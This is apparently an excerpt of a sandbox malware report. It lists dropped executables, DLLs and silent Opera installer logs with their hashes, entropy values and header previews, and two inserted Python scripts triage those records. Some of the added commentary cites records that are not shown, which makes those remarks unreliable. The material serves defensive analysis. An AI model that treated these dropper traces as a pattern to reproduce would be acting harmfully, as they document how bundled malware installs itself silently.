                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2146090
                                                                                                                          Entropy (8bit):7.982011327302058
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:LnQx4yrQsuKCDVZrKLbCW0wuY3X/BvLwJBg:qUKLpuY3PBDwJ2
                                                                                                                          MD5:0D69DD3893505245669619A06840C2FE
                                                                                                                          SHA1:4B62A51FFB4E5355D61F95962DAD44A97936FDB6
                                                                                                                          SHA-256:CA6667D8CED30113270B5728D6B104DA781A682F194FDCB1BD85FA2CD446FE19
                                                                                                                          SHA-512:650D6AF9F670D8CF28D965E52EC2AD6CB4EB58543E21DA6F9A4E3B1F9B239696300958FF51FF378FE02ED6AA3781DD9B91D5B9EADC53AEDB7EC441F1FF1DFC74
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................
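The per-file fields above (size, 8-bit entropy, MD5/SHA1/SHA-256, the "MZ" magic visible in each Preview) are the ones an analyst reproduces locally to triage a dropped-file set before trusting or ignoring the AV column. The following is an added example and not part of the Joe Sandbox report or its tooling. It assumes a packing threshold of 7.2 bits/byte (a common rule of thumb, not a report value), copies two SHA-256 values from the records above as the "known dropped" set, and uses two constructed byte buffers instead of the real dropped files.

```python
import hashlib
import math
from collections import Counter

# Heuristic cut-off for "probably packed / compressed / encrypted payload".
# Assumption: 7.2 bits/byte is a common triage rule of thumb, not a value
# taken from this report or from Joe Sandbox.
PACKED_ENTROPY_THRESHOLD = 7.2

# SHA-256 values copied from two dropped-file records above (lower-cased
# for lookup); the descriptions paraphrase those records' own fields.
KNOWN_DROPPED_SHA256 = {
    "ca6667d8ced30113270b5728d6b104da781a682f194fdcb1bd85fa2cd446fe19":
        "Nullsoft self-extracting archive written by InstallUtil.exe",
    "ba6625bece4e980de77e555b8626f63bec81ca9ba3e40701f7ed201db25153fd":
        "simplewebbuilder.exe written by the Inno Setup installer",
}


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0..8.0); the same measure
    the report lists as 'Entropy (8bit)'."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def file_hashes(data: bytes) -> dict:
    """MD5 / SHA1 / SHA-256 hex digests, lower-case, as listed per dropped file."""
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }


def lookup_known(sha256_hex: str):
    """Match a SHA-256 (any case) against the report's dropped-file set."""
    return KNOWN_DROPPED_SHA256.get(sha256_hex.lower())


def triage(data: bytes) -> dict:
    """Summarise one file the way the report does, plus two derived flags."""
    h = file_hashes(data)
    ent = shannon_entropy(data)
    return {
        **h,
        "size": len(data),
        "entropy": round(ent, 3),
        "is_pe": data[:2] == b"MZ",            # DOS/PE magic seen in every Preview
        "likely_packed": ent >= PACKED_ENTROPY_THRESHOLD,
        "known_dropped": lookup_known(h["sha256"]),
    }


# Constructed sample buffers (not files from the report): a mostly-zero "PE"
# stub, and a byte-uniform blob standing in for a compressed/encrypted overlay.
SAMPLE_PLAIN = b"MZ" + b"\x00" * 4094
SAMPLE_PACKED = b"MZ" + bytes(range(256)) * 16


if __name__ == "__main__":
    for name, buf in (("plain", SAMPLE_PLAIN), ("packed", SAMPLE_PACKED)):
        print(name, triage(buf))
```

Run against the records above, the split is visible: the Nullsoft archive written by InstallUtil.exe sits at 7.98 and the Inno Setup dropper at 6.98, while the console DLLs it unpacks sit between 6.1 and 6.6, which is ordinary compiled code. A 0% ReversingLabs score on those DLLs does not exonerate them (the report still marks them Malicious:true); entropy and vendor hits are both hints, and the hash set is what you pivot on.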
Process:C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:dropped
Size (bytes):2960760
Entropy (8bit):7.768475714302623
Encrypted:false
SSDEEP:49152:enSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHA:tWqlkLESgCRE/vhOjb05efd6e/oXHA
MD5:918151F14C10B6BB7533F6D97BF22D2D
SHA1:7B058C97929435886B28D658736BEBA993C7EA8F
SHA-256:7F4DF608DB59F2B9337C532B756AA885D4670A314339BCE35CD1D14106F73763
SHA-512:F05BB8A50AFA5E7D070D31CA1A57C3A15B1EE3927F16AB6FE27FBAE6AC9B5A0BE5484DB17BD5459E4ED02D3769C19B16B3CAE37E9A4DA0317E94374F5DFF05DC
Malicious:true
Process:C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:dropped
Size (bytes):2960760
Entropy (8bit):7.768479767034927
Encrypted:false
SSDEEP:49152:2nSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHI:lWqlkLESgCRE/vhOjb05efd6e/oXHI
MD5:442BA51AC0AF3E8D9F489F643AFA6268
SHA1:681867F9C25D27319DA3C197E5506CDA0FDDA36A
SHA-256:7974CDC50115E1D48544C30E120A7AF883B0B71281A17245100B197E282D4D51
SHA-512:F5C3350AF33AA92160989A0CF48605C49CEDDBBCD70849A4BD5974786A9BD912FF5102D6B984C434A8FF93C682625222D84988A7F711D81C8E2A3EA28D9028BC
Malicious:true
Process:C:\Users\user\Pictures\bizN5UTpdWpltkCaYrvmwbQI.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:dropped
Size (bytes):2960760
Entropy (8bit):7.7684742788158045
Encrypted:false
SSDEEP:49152:TnSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHQ:eWqlkLESgCRE/vhOjb05efd6e/oXHQ
MD5:45D3B5DA2599B55F638873CE9E5AF959
SHA1:A7D1E4BB85ACF0704795888C122F6F3B5061BB24
SHA-256:407EF2E99461CD63A29508433B363DE754413E387125C5EDF0BBD63D293B8AA8
SHA-512:8198EDB0D87C211F444D862AD2E8B277FBC36CBEF659E9E2F1E40DBCD7EE5E5EBA37F6A06461D67BD2D95F7B5BE2137182626F7BA20620BBA80E9F2EC7D1BD93
Malicious:true
Process:C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):4964352
Entropy (8bit):7.998473446596747
Encrypted:true
SSDEEP:98304:ekAPDoNnW1oBnzMVYUCBfeMG0OTtp7fEj8LrtXHMjDTfLDL0YF:ekGAdnQUBfSTvf+gZmDTNF
MD5:5C56D0DF44349C651936E82A24925CAF
SHA1:327473E064955C1CDB12FB7E048B281C460252F4
SHA-256:DFAB6E84A885679529D9DDB456C3CB160CF90A446562D57F3695DECCA3BE503D
SHA-512:1C73ADE4528BE5A043036BBFDD321E7D1E4B1A30C5FE34BA8E8781BBE5E5036026591F741E4BB4682D7D5B45423307373C48A79DF781D716D6BEAA5FCC8D9D29
Malicious:true
Process:C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):941056
Entropy (8bit):7.96943376939049
Encrypted:false
SSDEEP:24576:xACKxHk1sJgDqrFXexjOEQUaV62+xVSE0wWqlS2iS:ep2ASqpeZOvDo9xVDzWIr
MD5:C4B3D160FC9FAEDA29D57A8B1FC94322
SHA1:1BAA6BE4E86EF620B977E85D36D48000629928E3
SHA-256:33E4A5ADAD5CA8997AB83F197D276ACA388A36487D572FFCA6D66086EE967F66
SHA-512:13FE777F01E5C540BCEE2BA26DE2FCF577ABC57CD321D704B0FADD736DA03AEA6ECA288B600217D2A702310AA3BB5F73204F90816C0769582F4BB926BCE9337E
Malicious:true
Process:C:\Users\user\Pictures\xzRRQmj1LpBxF1iTy72H1YWe.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:dropped
Size (bytes):2960760
Entropy (8bit):7.7684781715563425
Encrypted:false
SSDEEP:49152:WnSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXH+:FWqlkLESgCRE/vhOjb05efd6e/oXH+
MD5:BCC38593B03EE04D072E36C9513BCF54
SHA1:23C84983EAB71EFBC7615B0E60A67D0D1C3A62D4
SHA-256:6B6A921F87E6FCC245DE2BADD36F3276B8A6662BBA129EDE2BE971FCF472FB8C
SHA-512:F6C75DDFB5B82466BC8271B4D6BA2B2AAC093F7F67C92C4AB0370C2FF15793BBC62170FC891836BB2B30EAC431F2302CC8B75AA6BA77E974F2F85FCC5A693241
Malicious:true
Process:C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe
File Type:ASCII text, with very long lines (521)
Category:dropped
Size (bytes):3697
Entropy (8bit):5.631742289964414
Encrypted:false
SSDEEP:48:VbqfKtbXtbNtbd8tbstbntbitb5Rs3tbDWUcVBYVPYQCERLPs3GFIqb7LdL3TKAE:VqexH3RLUSR8Kmeia+X5glVX5gl0NXa
MD5:051C911A844BBA0738765015F2CE104C
SHA1:23755CCCAF238E4546B5DCABF8E96BBBBE75FF3F
SHA-256:49C9181AA5A83C4DBC119336E79F1BE40E9345C1738C8496C50DCDECF8D947E9
SHA-512:0CECA5CE4BD342E939A3B297ABA4FE5344EE823369BE3F11E778E398EAD4889E892F99FF1316F8FCAE4CDA9ABE5C3E0804540BA6EF82E00585F8205A70B8644B
Malicious:false
Preview:[0312/085307.063:INFO:installer_main.cc(455)] Opera installer starting - version 108.0.5067.24 Stable.[0312/085307.063:INFO:installer_main.cc(458)] Command line: "C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe" --silent --allusers=0.[0312/085307.063:INFO:installer_main.cc(480)] Uninstall:0.[0312/085307.063:INFO:installer_main.cc(481)] Silent:1.[0312/085307.063:INFO:installer_main.cc(482)] Run Immediately0.[0312/085307.063:INFO:installer_main.cc(484)] Backend0.[0312/085307.063:INFO:installer_main.cc(485)] Inside package0.[0312/085307.063:INFO:installer_main.cc(486)] Autoupdate:0.[0312/085307.063:INFO:payload_manager_impl.cc(97)] Reading Payload.[0312/085307.063:INFO:installer_main.cc(636)] Tracking data: NTMyMmI3Y2E1N2MyZmY1NDJiNjUwNDg0Yzg1ZDJhNDMzMTYyOGI2OGYxOTQ2YTZjMGM5OTUwMGJkOGI2ZjExODp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2
Process:C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exe
File Type:ASCII text, with very long lines (521)
Category:modified
Size (bytes):3803
Entropy (8bit):5.594577145237454
Encrypted:false
SSDEEP:96:flkxT45EipPtGed4cfGpX5glgX5glbN6RL:flkt4pOt95gm5gJ6
MD5:98F2A52A6C525B87109865EA38C5747A
SHA1:3B9A778C22C2DCB1E1654E0661963B921FF95524
SHA-256:BECEB6E796C330917C98396D643BDDBD6DC964F5428C7F18226318E2775F9181
SHA-512:3FC86C5CD06AB7A87BFDCFD24858D5599205BBDA2DD9D8444EBFA35A340B00512AD63CAFDF66474EF74BAA3B4B8BABE8B24DB4CAB9C51250A5FD415074031242
Malicious:false
Preview:[0312/085318.383:INFO:installer_main.cc(455)] Opera installer starting - version 108.0.5067.24 Stable.[0312/085318.383:INFO:installer_main.cc(458)] Command line: "C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exe" --silent --allusers=0.[0312/085318.383:INFO:installer_main.cc(480)] Uninstall:0.[0312/085318.383:INFO:installer_main.cc(481)] Silent:1.[0312/085318.383:INFO:installer_main.cc(482)] Run Immediately0.[0312/085318.383:INFO:installer_main.cc(484)] Backend0.[0312/085318.383:INFO:installer_main.cc(485)] Inside package0.[0312/085318.383:INFO:installer_main.cc(486)] Autoupdate:0.[0312/085318.383:INFO:payload_manager_impl.cc(97)] Reading Payload.[0312/085318.383:INFO:installer_main.cc(636)] Tracking data: NGIzYzZhZDljNjZkMWUwYTI0ZWFiZTk0ZmNkYTFhNjAxODYyOTI2YWRlODdjMjBhZjg2ZjZkMWYwZWY2Mjk5Yzp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2
Process:C:\Users\user\Pictures\bizN5UTpdWpltkCaYrvmwbQI.exe
File Type:ASCII text, with very long lines (521)
Category:modified
Size (bytes):3889
Entropy (8bit):5.605180960286787
Encrypted:false
SSDEEP:48:PbqfKnb5FnbNnbd8nbsnbnnbinb5bs3nbuLcVBYVPwCAC53CjFCtqCd7LdL3CdKf:1Yp7xwq5ycrjKeRmX5glR6X5glIcNH
MD5:D9DD9A174B1CB1646783CA8893EBE720
SHA1:E275272FB7E0AF4407E44C8A1DFC5EFF2BB41DB9
SHA-256:79933DC0EA7ADF49FB9CBB01D8143EB283441CC674242DE6FD70C54C7FF73D49
SHA-512:472E8F33573AB80FCF0E8F395B94D4FCDC20A8EE2FDCB440FB768D1CFB1D2E956F776B2DE4B42225F6E67120978E701095C292FAF18929EEF214387AF3CE352F
Malicious:false
Preview:[0312/085332.766:INFO:installer_main.cc(455)] Opera installer starting - version 108.0.5067.24 Stable.[0312/085332.766:INFO:installer_main.cc(458)] Command line: "C:\Users\user\Pictures\bizN5UTpdWpltkCaYrvmwbQI.exe" --silent --allusers=0.[0312/085332.766:INFO:installer_main.cc(480)] Uninstall:0.[0312/085332.766:INFO:installer_main.cc(481)] Silent:1.[0312/085332.766:INFO:installer_main.cc(482)] Run Immediately0.[0312/085332.766:INFO:installer_main.cc(484)] Backend0.[0312/085332.766:INFO:installer_main.cc(485)] Inside package0.[0312/085332.766:INFO:installer_main.cc(486)] Autoupdate:0.[0312/085332.766:INFO:payload_manager_impl.cc(97)] Reading Payload.[0312/085332.766:INFO:installer_main.cc(636)] Tracking data: ZDI5YmQxMjlhNWNiNzZhMjliNmY3MDE5NWMwYjE3NjUwYzlhZmEzNzNmZDM2MjA3MGJmYTY4ODgxMDE0YmE1Mjp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2
Process:C:\Users\user\Pictures\xzRRQmj1LpBxF1iTy72H1YWe.exe
File Type:ASCII text, with very long lines (521)
Category:modified
Size (bytes):3626
Entropy (8bit):5.633179578975675
Encrypted:false
SSDEEP:48:rbqfKTbUTbNTbd8TbsTbnTbiTb53s3TbBcVBYVPOCkyW3MF+qQ7LdL3SKAZSfzPK:m86xODlceBIiX5glTX5glvNmv
MD5:1501E78B020D2B32A52443C1C4D2ADA2
SHA1:D0D798B693B3A86E185561BA42907EFA3860F074
SHA-256:3A21FF3E91760B9DCDECCB1460510B0BEDAF2F7D8EB7F503315CB0D2FCE9E82A
SHA-512:0CB91712E16439CBED02D829FD5E654BF81CEE34BBFE6492D157AACB36206B04E0E51F8772E701A7022E232D1C6E3E2CEBD528691226C7408D7109B9C57037F2
Malicious:false
Preview:[0312/085338.724:INFO:installer_main.cc(455)] Opera installer starting - version 108.0.5067.24 Stable.[0312/085338.724:INFO:installer_main.cc(458)] Command line: "C:\Users\user\Pictures\xzRRQmj1LpBxF1iTy72H1YWe.exe" --silent --allusers=0.[0312/085338.724:INFO:installer_main.cc(480)] Uninstall:0.[0312/085338.724:INFO:installer_main.cc(481)] Silent:1.[0312/085338.724:INFO:installer_main.cc(482)] Run Immediately0.[0312/085338.724:INFO:installer_main.cc(484)] Backend0.[0312/085338.724:INFO:installer_main.cc(485)] Inside package0.[0312/085338.724:INFO:installer_main.cc(486)] Autoupdate:0.[0312/085338.724:INFO:payload_manager_impl.cc(97)] Reading Payload.[0312/085338.724:INFO:installer_main.cc(636)] Tracking data: MjljNGZlODRiZTgxOTYzZDIyMDI5OTkyZDUzMzMzMDZmM2FjMDkzM2I2YTdjZTMxNDJjZWYzMTU5ZjdhZjExZjp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2
Process:C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:dropped
Size (bytes):1828864
Entropy (8bit):7.40381475947401
Encrypted:false
SSDEEP:49152:YUnaQiKJ8N+AadA6mICFhNGffVCPi9NUko6jE:ZwKa+u6mICFSwPKDK
MD5:EEE5DDCFFBED16222CAC0A1B4E2E466E
SHA1:28B40C88B8EA50B0782E2BCBB4CC0F411035F3D5
SHA-256:2A40E5DCCC7526C4982334941C90F95374460E2A816E84E724E98C4D52AE8C54
SHA-512:8F88901F3EBD425818DB09F268DF19CCF8A755603F04E9481BCF02B112A84393F8A900EAD77F8F971BFA33FD9FA5636B7494AAEE864A0FB04E3273911A4216DC
Malicious:true
Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 75%
                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...F..^.................P........7.@YN...7..`N...@...........................S..................@....................<.......R.@....`N......................................................[N...............................<.....................UPX0......7.............................UPX1.....P....7..L..................@....rsrc........`N......P..............@..............................................................................................................................................................................................................................................................................................................................................................................4.22.UPX!....
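The two rows above carry more than hashes: the Opera installer log embeds a base64 "Tracking data" blob, and the preview of the UPX-compressed PE exposes the packer's section names and trailer in plain text. The script below is an added example, not part of the Joe Sandbox report or of any tool it references, that re-derives those observations with the standard library only. It decodes the tracking blob exactly as it appears in the preview (the preview is cut at a fixed length, so the trailing JSON is truncated and is reported as such rather than completed), recomputes the 8-bit Shannon entropy the "Entropy (8bit)" column uses, and runs a cheap packer/linker triage over an abridged copy of the UPX preview. The leading 64-hex-character token in the decoded blob is left uninterpreted; that it is a hash or an installer ID is an assumption, not something the log states.

```python
"""Added example (not part of the Joe Sandbox report): re-derive a few of the
fields shown in the dropped-file rows above and decode the Opera installer
'Tracking data' blob.  Only the standard library is used."""
import base64
import math
import re
from collections import Counter

# Copied verbatim from the installer_main.cc(636) log line in the preview above.
# Joe Sandbox cuts previews at a fixed length, so the trailing JSON is truncated.
TRACKING_DATA_B64 = (
    "MjljNGZlODRiZTgxOTYzZDIyMDI5OTkyZDUzMzMzMDZmM2FjMDkzM2I2YTdjZTMxNDJjZWYzMTU5ZjdhZjExZjp7"
    "ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6"
    "Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2"
)

# Abridged copy of the preview of the UPX-compressed dropped PE above
# (non-printable bytes are shown as '.', long runs of '.' shortened).
UPX_PREVIEW = (
    "MZP.....@....!..L.!..This program must be run under Win32..$7....PE..L...F..^...."
    "UPX0......7....UPX1.....P....7..L....@....rsrc........`N......P.....@....4.22.UPX!...."
)


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte, 0.0 .. 8.0; the 'Entropy (8bit)' measure."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def decode_truncated_base64(s: str) -> bytes:
    """Decode base64 that a fixed-length preview may have cut mid-quantum.

    A dangling single character carries no complete byte and is dropped; the
    rest is re-padded.  Everything outside the base64 alphabet is ignored."""
    s = re.sub(r"[^A-Za-z0-9+/]", "", s)
    if len(s) % 4 == 1:
        s = s[:-1]
    return base64.b64decode(s + "=" * (-len(s) % 4))


def parse_tracking_data(b64: str) -> dict:
    """Split the decoded blob into its leading token and the JSON fragment.

    String-valued pairs are pulled out with a regex rather than json.loads
    because the fragment is truncated; a value cut off by the preview is kept
    as-is and the truncation is flagged, not guessed at."""
    raw = decode_truncated_base64(b64).decode("utf-8", errors="replace")
    token, _, body = raw.partition(":")
    fields = dict(re.findall(r'"([^"]+)":"([^"]*)(?:"|$)', body))
    return {
        "token": token,
        "fields": fields,
        "json_truncated": not body.rstrip().endswith("}"),
    }


def triage_preview(preview: str) -> dict:
    """Cheap packer/linker hints from the printable preview of a PE header."""
    return {
        "upx_sections": sorted(set(re.findall(r"UPX[0-2]", preview))),
        # packer trailer; the version string ("4.22" above) sits just before it
        "upx_footer": "UPX!" in preview,
        # DOS stub text written by Borland/Delphi linkers
        "borland_stub": "This program must be run under Win32" in preview,
        # 'MZP' at offset 0 is likewise seen on Borland/Delphi-linked binaries
        "mzp_header": preview.startswith("MZP"),
    }


if __name__ == "__main__":
    info = parse_tracking_data(TRACKING_DATA_B64)
    print("token:", info["token"])
    for key, value in info["fields"].items():
        print(f"  {key} = {value}")
    print("json truncated by preview:", info["json_truncated"])
    print("preview triage:", triage_preview(UPX_PREVIEW))
    blob = decode_truncated_base64(TRACKING_DATA_B64)
    print("entropy of decoded blob: %.3f bits/byte" % shannon_entropy(blob))
```

Two checks worth carrying over to the table itself: a base64 alphabet caps entropy at log2(64) = 6 bits per byte, so the 500000-byte "ASCII text" drop further down at 6.02 is consistent with the base64-looking preview it shows, while the UPX-packed PE at 7.40 and the 4.8 MB DLL at 6.88 sit where compressed or mixed-content binaries usually do. Entropy alone never proves packing; the section names and the "UPX!" trailer do, which is why the triage looks for both.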
                                                                                                                          Process:C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4852640
                                                                                                                          Entropy (8bit):6.878125903025885
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:98304:g6666666666666666666666666666666x666666666666666fwwwwwwwwwwwwwwC:lfKo30lSzTXr4dHUkrPwh/X5zWilPD5N
                                                                                                                          MD5:FDEB4D1D95A738BA8882988A97A12D32
                                                                                                                          SHA1:42DD25CAE583521AA96A02B5135BBA6FDE9AC3FB
                                                                                                                          SHA-256:1C52520C6D2398A266245A1D29FCF5B58FF7BB8F7ECF8868898BAB7BCAD37D6E
                                                                                                                          SHA-512:4CB87510D4612A36C83543CA58A17469AA8AAEE569481C121D2D70A7923D7174EFBDCEDE18342F49BB26AA0BBCD44B58630697EF54986AA5EFBF2B3920EF33CF
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e.........."!.....`3..z......@.'.......................................K.....8.J...@A.........................];.m....];.......=..4............I..)....I.p.....;.....................0.;......x3..............h;.4...<\;.`....................text...._3......`3................. ..`.rdata...[...p3..\...d3.............@..@.data.........;..@....;.............@....rodata......p=.......<............. ..`.tls....].....=.......<.............@...CPADinfo0.....=.......<.............@...malloc_h......=.......<............. ..`.rsrc....4....=..6....<.............@..@.reloc..p.....I......>H.............@..B................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4852640
                                                                                                                          Entropy (8bit):6.878125903025885
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:98304:g6666666666666666666666666666666x666666666666666fwwwwwwwwwwwwwwC:lfKo30lSzTXr4dHUkrPwh/X5zWilPD5N
                                                                                                                          MD5:FDEB4D1D95A738BA8882988A97A12D32
                                                                                                                          SHA1:42DD25CAE583521AA96A02B5135BBA6FDE9AC3FB
                                                                                                                          SHA-256:1C52520C6D2398A266245A1D29FCF5B58FF7BB8F7ECF8868898BAB7BCAD37D6E
                                                                                                                          SHA-512:4CB87510D4612A36C83543CA58A17469AA8AAEE569481C121D2D70A7923D7174EFBDCEDE18342F49BB26AA0BBCD44B58630697EF54986AA5EFBF2B3920EF33CF
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e.........."!.....`3..z......@.'.......................................K.....8.J...@A.........................];.m....];.......=..4............I..)....I.p.....;.....................0.;......x3..............h;.4...<\;.`....................text...._3......`3................. ..`.rdata...[...p3..\...d3.............@..@.data.........;..@....;.............@....rodata......p=.......<............. ..`.tls....].....=.......<.............@...CPADinfo0.....=.......<.............@...malloc_h......=.......<............. ..`.rsrc....4....=..6....<.............@..@.reloc..p.....I......>H.............@..B................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4852640
                                                                                                                          Entropy (8bit):6.878125903025885
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:98304:g6666666666666666666666666666666x666666666666666fwwwwwwwwwwwwwwC:lfKo30lSzTXr4dHUkrPwh/X5zWilPD5N
                                                                                                                          MD5:FDEB4D1D95A738BA8882988A97A12D32
                                                                                                                          SHA1:42DD25CAE583521AA96A02B5135BBA6FDE9AC3FB
                                                                                                                          SHA-256:1C52520C6D2398A266245A1D29FCF5B58FF7BB8F7ECF8868898BAB7BCAD37D6E
                                                                                                                          SHA-512:4CB87510D4612A36C83543CA58A17469AA8AAEE569481C121D2D70A7923D7174EFBDCEDE18342F49BB26AA0BBCD44B58630697EF54986AA5EFBF2B3920EF33CF
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e.........."!.....`3..z......@.'.......................................K.....8.J...@A.........................];.m....];.......=..4............I..)....I.p.....;.....................0.;......x3..............h;.4...<\;.`....................text...._3......`3................. ..`.rdata...[...p3..\...d3.............@..@.data.........;..@....;.............@....rodata......p=.......<............. ..`.tls....].....=.......<.............@...CPADinfo0.....=.......<.............@...malloc_h......=.......<............. ..`.rsrc....4....=..6....<.............@..@.reloc..p.....I......>H.............@..B................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\7odVnHyI6UBWlRBALo6WuNSW.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4852640
                                                                                                                          Entropy (8bit):6.878125903025885
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:98304:g6666666666666666666666666666666x666666666666666fwwwwwwwwwwwwwwC:lfKo30lSzTXr4dHUkrPwh/X5zWilPD5N
                                                                                                                          MD5:FDEB4D1D95A738BA8882988A97A12D32
                                                                                                                          SHA1:42DD25CAE583521AA96A02B5135BBA6FDE9AC3FB
                                                                                                                          SHA-256:1C52520C6D2398A266245A1D29FCF5B58FF7BB8F7ECF8868898BAB7BCAD37D6E
                                                                                                                          SHA-512:4CB87510D4612A36C83543CA58A17469AA8AAEE569481C121D2D70A7923D7174EFBDCEDE18342F49BB26AA0BBCD44B58630697EF54986AA5EFBF2B3920EF33CF
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e.........."!.....`3..z......@.'.......................................K.....8.J...@A.........................];.m....];.......=..4............I..)....I.p.....;.....................0.;......x3..............h;.4...<\;.`....................text...._3......`3................. ..`.rdata...[...p3..\...d3.............@..@.data.........;..@....;.............@....rodata......p=.......<............. ..`.tls....].....=.......<.............@...CPADinfo0.....=.......<.............@...malloc_h......=.......<............. ..`.rsrc....4....=..6....<.............@..@.reloc..p.....I......>H.............@..B................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Users\user\Pictures\bizN5UTpdWpltkCaYrvmwbQI.exe
